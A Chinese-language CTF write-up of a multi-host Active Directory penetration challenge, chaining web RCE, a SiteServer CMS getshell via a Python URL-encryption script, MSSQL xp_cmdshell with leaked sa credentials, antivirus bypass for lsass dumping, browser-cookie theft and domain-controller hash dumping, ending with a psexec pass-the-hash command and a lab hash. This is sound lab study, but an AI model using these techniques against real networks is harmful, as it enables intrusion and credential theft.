Dozer 域渗透系列 By 春 预期

Dozer 域渗透系列 By 春

前言

因为有非预期的存在,导致题目究极白给,我会尽力按照预期解去写

题目质量很棒,期待来年再见

10.10.1.47 (Light_CMS)

是前几天红帽杯郭院士的那个后台Rce的改编版本

testinclude下有文件包含

Rce

image-20210530230129755

由于这个机器似乎会自动重启,完了还卡。主办方加了个后门

10.10.1.128 (官方后门)

起个msf就可以无脑上线了

image-20210530231737277

10.10.1.234 (SiteServer)

注册账户,按照github复现下 (有一说一 默认给的exp路径居然不可写)

GitHub – zhaoweiho/SiteServer-CMS-Remote-download-Getshell: SiteServer CMS 5.x远程模板下载Getshell漏洞

这里要借助边界机器的web服务

from pyDes import *
import base64

iv = "\x12\x34\x56\x78\x90\xAB\xCD\xEF"
key = "vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5"
input_str = "http://10.10.1.47/upload/image/poxteam.zip"

#encrypt
k = des(key[0:8], CBC, iv,pad=None, padmode=PAD_PKCS5)
a = k.encrypt(input_str)
c = base64.b64encode(a)
d = c.replace("+", "0add0").replace("=", "0equals0").replace("&", "0and0").replace("?", "0question0").replace("/", "0slash0")
print d

#decrypt
en = d.replace("0add0","+").replace("0equals0","=" ).replace("0and0","&" ).replace("0question0","?").replace("0slash0","/")
#en  = "ZjYIub/YxA2hc47NUFitAa/c/WMcuk7GQ4+P+eVq1v9u/TV3zrsdlbmZpWolkpKR"
b64en = base64.b64decode(en)
t = k.decrypt(b64en)
print t

生成下加密url,访问就完事了

image-20210530234552564

Bind_tcp

image-20210531000118880

然后MSF就可以无脑上线了

flag在 web.config.bak

10.10.1.231 (MS-SQL)

可以在10.10.10.234 的webconfig看到配置信息

解密下

server=10.10.1.231;uid=sa;pwd=msO.9uXC;database=site

测试过程 中发现远程又杀毒,进一步测试发现是卡巴斯基

而卡巴斯基不会拦截Xp_Cmdshell

即直接开启xp_cmdshell后命令执行即可

image-20210531001123142

没降权。直接net user add就可以3389上去了

查看进程,有一个DozerOCS.exe

image-20210531150253420

发现其是Alice用户起的

通过bypass下卡巴斯基的内存保护,可以dump lsass

但是里面没有Alice的hash 所以没啥用

这里其实可以直接把卡巴斯基卸载了,但是实战显然不适用

dump这文件的内存 String 下

image-20210531155926737

获取alice密码

10.10.1.121 (PC)

用Alice用户登录pc

alice 后来都没开机 2333

10.10.1.250 (WordPress)

Alice 的 PC 里有高端的 Chrome浏览器

找下cookie。可以拿到WordPress的cookie

image-20210531134807266

image-20210531140451321

cookie上去 写个shell 直接Rce

10.10.1.1 (DC)

在上一台机器可以rce,是高权限的本地管理员。

可以直接dunp hash 里面有域管的hash

10.10.1.100 (Exchange)

看到域用户有个叫flag的,根据去年的经验,应该是exchange里有flag,直接改密码

net user flag !qaz2wsx

用flag用户登录,Flag在邮箱里

预期据说不用改密码

以下为非预期

其实第一天拿到shell,发现域控17010 233333

直接拿到域管hash,全部pth上去拿flag

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9912e73b8ee265638b43d105fdb4c6f4 dozer/Administrator@10.10.1.1

由于时间不太够了 而且shell有点点不稳,有的机器好像存在问题,有点不太好复现,暂时写非预期2333

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

Protected with IP Blacklist CloudIP Blacklist Cloud